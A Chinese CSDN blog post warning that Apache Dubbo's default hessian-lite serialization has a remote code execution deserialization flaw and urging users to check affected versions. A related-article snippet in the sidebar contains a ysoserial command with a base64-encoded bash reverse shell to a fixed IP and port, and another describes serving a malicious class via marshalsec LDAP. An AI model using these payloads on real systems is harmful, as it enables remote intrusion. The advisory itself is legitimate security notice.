Apache Dubbo 高危漏洞

最新推荐文章于 2024-05-24 17:17:52 发布
最新推荐文章于 2024-05-24 17:17:52 发布
阅读量772 收藏
点赞数
分类专栏: java 文章标签: dubbo apache linux 容器 ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zb_3Dmax/article/details/126716858
版权

你好,我是yes。

前不久 Log4j2 的漏洞不是闹得沸沸扬扬吗,上百个应用更新的那一天,还记忆犹新。

今天又看到了个 Apache Dubbo 的高危漏洞通告,好家伙一看这版本,我们的应用有漏洞…

其实这个漏洞爆出来已经很多天了,影响面没 Log4j2 大,所以没那么“火”,不过也是个高危漏洞。

又是一个可以远程代码执行的漏洞,漏洞的类型是因为反序列化的问题。

从 360网络安全响应中心官网来看,1.14 号就通告了。

对这个漏洞的评定结果如下:

可以看到,还是属于影响比较严重的漏洞。

具体是因为 Apache Dubbo hessian-lite 3.2.11 及之前的版本存在反序列化漏洞,而这个 hessina-lite 恰巧就是 Dubbo 默认的序列化方法

hessian2序列化:hessian是一种跨语言的高效二进制序列化方式。但这里实际不是原生的hessian2序列化,而是阿里修改过的hessian lite,它是dubbo RPC默认启用的序列化方式

一般没特殊需求都不会改默认的实现,所以大部分用了 Dubbo 都会中这个招。

具体的影响版本如下:

所以用 Dubbo 的同学快去排查下自己的应用,看看是否受到影响。

参考:https://cert.360.cn/warning/detailid=413132b068d5e062e3059adc758d3500

我是yes,我们下篇见~

zb_3Dmax
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 676
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
Apache DubboApacheDubbo简介与快速入门
07-12
Apache DubboApacheDubbo简介与快速入门 。Dubbo采用RPC(远程过程调用)协议,使 得服务调用像调用本地方法一样简单,同时提供了服务自动注册与发现、智能路由、负载均衡、容错、服务降级等高级功能
漏洞预警|Apache Dubbo 存在反序列化漏洞
LJQClqjc的博客
03-09 714
棱镜七彩安全预警
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1052
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Apache Dubbo反序列化漏洞
YJ_12340的博客
05-24 838
Dubbo是阿里巴巴公司开源的一个高性能优秀的服务框架,使得应用可通过高性能的RPC实现服务的输出和输入功能,可以和Spring框架无缝集成。2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为,漏洞等级:高危Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
Apache Dubbo 被曝出“高危”远程代码执行漏洞
朱小厮的博客
06-25 1216
击上方“朱小厮的博客”,选择“设为星标”后台回复"加群",加入组织来源:22j.co/brUT0x01 漏洞背景2020年06月23日, 360CERT监测发现 Apac...
apache dubbo 3.0.7源码
05-06
Apache Dubbo 3.0.7 是一个高性能、轻量级的开源Java RPC框架,它由阿里集团贡献并维护,现已成为Apache顶级项目。Dubbo的主要目标是提供一种简单、高效的服务发现和服务治理方案,使得分布式系统开发变得更加便捷。...
Apache Dubbo
08-18
Apache DubboSpring Boot项目使创建[Spring Boot]变得容易(https://github.com/spring-projects/spring-boot/)使用Dubbo作为RPC框架的应用程序。
Apache Dubbo3 源码深入解析
04-07
Apache Dubbo3 源码深入解析》是一本详细探讨Apache Dubbo这一高性能的WEB和RPC框架的著作。Dubbo不仅提供了基本的服务调用功能,还为构建企业级微服务环境提供了服务发现、流量治理、可观测性以及认证鉴权等功能...
Apache DubboDubbo配置与参数详解
最新发布
07-12
Apache DubboDubbo配置与参数详解 Dubbo是著名的RCP框架,文档内有干货,提供代码和可复现的命令,值得借鉴。
dubbo-hessian-lite
11-04
dubbo源码编译时依赖的hessian-lite,由于阿里对部分链接的屏蔽无法解决这个依赖,所以需要用户先下载然后mvn install到本地来解决依赖问题
漏洞预警】Apache Dubbo反序列化漏洞及修复方案
讯开技术孵化器博客
07-01 2644
漏洞描述 Apache Dubbo是一款应用广泛的Java RPC分布式服务框架。Apache Dubbo于2020年6月23日披露在Dubbo Provider中存在一个反序列化远程代码执行漏洞(CVE-2020-1948),官方发布2.7.7版本修复漏洞,但近日该漏洞补丁被绕过,经阿里云工程师测试绕过有效,且目前官方还未发布新版本,漏洞属0day级,风险极大。阿里云应急响应中心提醒Apache Dubbo用户尽快采取安全措施阻止漏洞攻击。 2020年6月29日,阿里云应急响应中心监测到Apache Du
rmi 反序列化漏洞_[漏洞分析]CVE201917564/Apache Dubbo存在反序列化漏洞
weixin_29284885的博客
01-07 227
漏洞描述Apache Dubbo支持多种协议,官方推荐使用Dubbo协议.Apache Dubbo HTTP协议中的一个反序列化漏洞(CVE-2019-17564),该漏洞的主要原因在于当Apache Dubbo启用HTTP协议之后,Apache Dubbo对消息体处理不当导致不安全反序列化,当项目包中存在可用的gadgets时即可导致远程代码执行.CVE编号CVE-2020-17564...
Dubbo 爆出严重漏洞! 可远程执行恶意代码!(附解决方案)
公众号:Java后端
02-17 2458
链接:https | www.anquanke.com/post/id/198747近日检测到Apache Dubbo官方发布了CVE-2019-17564漏洞通告,360灵腾安全实验室...
Dubbo常用协议之Dubbo协议与Hessian协议解析
qq_40837310的博客
07-15 4086
前言 Dubbo 允许配置多协议,在不同服务上支持不同协议或者同一服务上同时支持多种协议。不同服务在性能上适用不同协议进行传输,比如大数据用短连接协议,小数据大并发用长连接协议。 Dubbo协议 Dubbo 缺省协议采用单一长连接和 NIO 异步通讯,适合于小数据量大并发的服务调用,以及服务消费者机器数远大于服务提供者机器数的情况。 反之,Dubbo 缺省协议不适合传送大数据量的服务,比如传文件,传视频等,除非请求量很低。 Dubbo协议能使用的传输方式:mina、netty、grizzy Dubbo协议能
Dubbo从2.5.3升级到2.7.7记录(避免Dubbo远程代码执行漏洞
a10534126的博客
04-01 2642
背景 近日 Dubbo 官方报告了一个 Dubbo 远程代码执行问题(CVE-2020-1948),该问题由 Provider 反序列化漏洞引起。根据介绍,攻击者可以使用无法识别的服务名称或方法名称,并带上一些恶意参数有效载荷发送 RPC 请求。当恶意参数反序列化后,将执行一些恶意代码。 受影响的版本: 2.7.0 <= Dubbo Version <= 2.7.6 2.6.0 <= Dubbo Version <= 2.6.7 所有 2.5.x 版本(官方团队不再支持) 我们之
alibaba版本的dubbo在override机制上的bug
zidongxiangxi的博客
04-13 301
背景 在之前尝试做dubbo的灰度发布方案《dubbo灰度发布》。 在实现的过程中,发现当provider指定了group或者version,而consumer使用*号来匹配所有group或version的时候,alibaba版本和apache版本的dubbo的行为不一样。 apache版本是运行正常,但是alibaba版本的consumer却会出现group和version被覆盖的问题。 问题原因 当consumer监听到configurators目录下的变化,首先需要判断对应的连接是否它关心的: 大
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值